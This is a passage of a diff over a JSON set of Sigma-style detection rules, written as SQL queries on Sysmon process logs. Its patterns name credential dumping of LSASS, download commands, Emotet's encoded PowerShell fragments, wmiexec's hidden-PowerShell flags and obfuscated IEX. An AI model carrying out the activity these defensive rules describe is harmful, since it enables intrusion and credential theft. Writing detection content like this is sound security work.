backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml" + "filename": "proc_creation_win_malware_pingback_backdoor.yml" }, { - "title": "Sysmon Configuration Update", - "id": "87911521-7098-470b-a459-9a57fc80bdfd", + "title": "Execute Files with Msdeploy.exe", + "id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", "status": "test", - "description": "Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects file execution using the msdeploy.exe lolbin", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate administrators might use this command to update Sysmon configuration." + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-c%' ESCAPE '\\' OR CommandLine LIKE '%/c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%verb:sync%' ESCAPE '\\' AND CommandLine LIKE '%-source:RunCommand%' ESCAPE '\\' AND CommandLine LIKE '%-dest:runCommand%' ESCAPE '\\' AND Image LIKE '%\\\\msdeploy.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml" + "filename": "proc_creation_win_lolbin_msdeploy.yml" }, { - "title": "Potential LSASS Process Dump Via Procdump", - "id": "5afee48e-67dd-4e03-a783-f74259dcf998", - "status": "stable", - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via TypedPaths - CommandLine", + "id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" + "attack.persistence" ], "falsepositives": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" + "filename": "proc_creation_win_registry_typed_paths_persistence.yml" }, { - "title": "HackTool - WinRM Access Via Evil-WinRM", - "id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", - "status": "test", - "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "title": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", + "id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "status": "experimental", + "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ruby.exe' ESCAPE '\\' AND CommandLine LIKE '%-i %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '% qfe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_evil_winrm.yml" + "filename": "proc_creation_win_wmic_recon_hotfix.yml" }, { - "title": "Execution via Diskshadow.exe", - "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "title": "Trickbot Malware Reconnaissance Activity", + "id": "410ad193-a728-4107-bc79-4419789fcbf8", "status": "test", - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "author": "Ivan Dyachkov, oscd.community", + "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", + "author": "David Burkett, Florian Roth", "tags": [ - "attack.execution", - "attack.t1218" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + "Rare System Admin Activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND Image LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_diskshadow.yml" + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" }, { - "title": "ZOHO Dctask64 Process Injection", - "id": "6345b048-8441-43a7-9bed-541133633d7a", + "title": "HackTool - DInjector PowerShell Cradle Execution", + "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", "status": "test", - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" + "filename": "proc_creation_win_hktl_dinjector.yml" }, { - "title": "UAC Bypass Using ChangePK and SLUI", - "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation", + "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "status": "test", - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" }, { - "title": "Potential Emotet Activity", - "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "status": "stable", - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "author": "Florian Roth (Nextron Systems)", + "title": "Rundll32 Execution Without Parameters", + "id": "5bb68627-3198-40ca-b458-49f973db8752", + "status": "test", + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "author": "Bartlomiej Czyz, Relativity", "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "False positives may occur if a user called rundll32 from CLI with no options" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine IN ('rundll32.exe', 'rundll32'))" ], - "filename": "proc_creation_win_malware_emotet.yml" + "filename": "proc_creation_win_rundll32_without_parameters.yml" }, { - "title": "Usage Of Web Request Commands And Cmdlets", - "id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", + "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", "status": "test", - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", - "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.execution", + "attack.persistence", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR CommandLine LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" + "filename": "proc_creation_win_schtasks_reg_loader.yml" }, { - "title": "File Download Via Bitsadmin To A Suspicious Target Folder", - "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious MSHTA Child Process", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "status": "test", + "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", + "author": "Michael Haag", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" ], "falsepositives": [ - "Unknown" + "Printer software / driver installations", + "HP software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + "filename": "proc_creation_win_mshta_susp_child_processes.yml" }, { - "title": "PUA - NirCmd Execution", - "id": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "title": "Launch-VsDevShell.PS1 Proxy Execution", + "id": "45d3a03d-f441-458c-8883-df101a3bb146", "status": "experimental", - "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1216.001" ], "falsepositives": [ - "Legitimate use by administrators" + "Legitimate usage of the script by a developer" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NirCmd.exe' ESCAPE '\\' OR OriginalFileName = 'NirCmd.exe' OR (CommandLine LIKE '% execmd %' ESCAPE '\\' OR CommandLine LIKE '%.exe script %' ESCAPE '\\' OR CommandLine LIKE '%.exe shexec %' ESCAPE '\\' OR CommandLine LIKE '% runinteractive %' ESCAPE '\\')) OR ((CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% exec2 %' ESCAPE '\\') AND (CommandLine LIKE '% show %' ESCAPE '\\' OR CommandLine LIKE '% hide %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Launch-VsDevShell.ps1%' ESCAPE '\\' AND (CommandLine LIKE '%VsWherePath %' ESCAPE '\\' OR CommandLine LIKE '%VsInstallationPath %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nircmd.yml" + "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml" }, { - "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", - "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "title": "Winrar Execution in Non-Standard Folder", + "id": "4ede543c-e098-43d9-a28f-dd784a13132f", "status": "test", - "description": "Detects new commands that add new printer port which point to suspicious file", - "author": "EagleEye Team, Florian Roth", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "author": "Florian Roth (Nextron Systems), Tigzy", "tags": [ - "attack.persistence", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "New printer port install on host" + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((Image LIKE '%\\\\WinRAR%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2020_1048.yml" + "filename": "proc_creation_win_winrar_execution.yml" }, { - "title": "Potential Credential Dumping Via LSASS Process Clone", - "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "title": "Execute Code with Pester.bat", + "id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", "status": "test", - "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Unknown" + "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Pester%' ESCAPE '\\' AND CommandLine LIKE '%Get-Help%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%pester%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\' AND (CommandLine LIKE '%help%' ESCAPE '\\' OR CommandLine LIKE '%_%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_lsass_clone.yml" + "filename": "proc_creation_win_lolbin_pester_1.yml" }, { - "title": "Suspicious Msbuild Execution By Uncommon Parent Process", - "id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", + "title": "HackTool - Wmiexec Default Powershell Command", + "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", "status": "experimental", - "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", - "author": "frack113", + "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSBuild.exe' ESCAPE '\\' OR OriginalFileName = 'MSBuild.exe') AND NOT ((ParentImage LIKE '%\\\\devenv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\python.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nuget.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msbuild_susp_parent_process.yml" + "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" }, { - "title": "Remote Access Tool - AnyDesk Execution", - "id": "b52e84a3-029e-4529-b09b-71d19dd27e94", + "title": "Arbitrary Command Execution Using WSL", + "id": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary linux and windows commands", + "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Legitimate use" + "Automation and orchestration scripts may use this method to execute scripts etc.", + "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR OriginalFileName = 'wsl.exe') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --exec%' ESCAPE '\\' OR CommandLine LIKE '% --system%' ESCAPE '\\' OR CommandLine LIKE '% --shell-type %' ESCAPE '\\' OR CommandLine LIKE '% /mnt/c%' ESCAPE '\\' OR CommandLine LIKE '% --user root%' ESCAPE '\\' OR CommandLine LIKE '% -u root%' ESCAPE '\\' OR CommandLine LIKE '%--debug-shell%' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -e kill %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk.yml" + "filename": "proc_creation_win_wsl_lolbin_execution.yml" }, { - "title": "Execution in Outlook Temp Folder", - "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", - "status": "test", - "description": "Detects a suspicious program execution in Outlook temp folder", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Firewall Configuration Discovery Via Netsh.EXE", + "id": "0e4164da-94bc-450d-a7be-a4b176179f1f", + "status": "experimental", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.discovery", + "attack.t1016" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 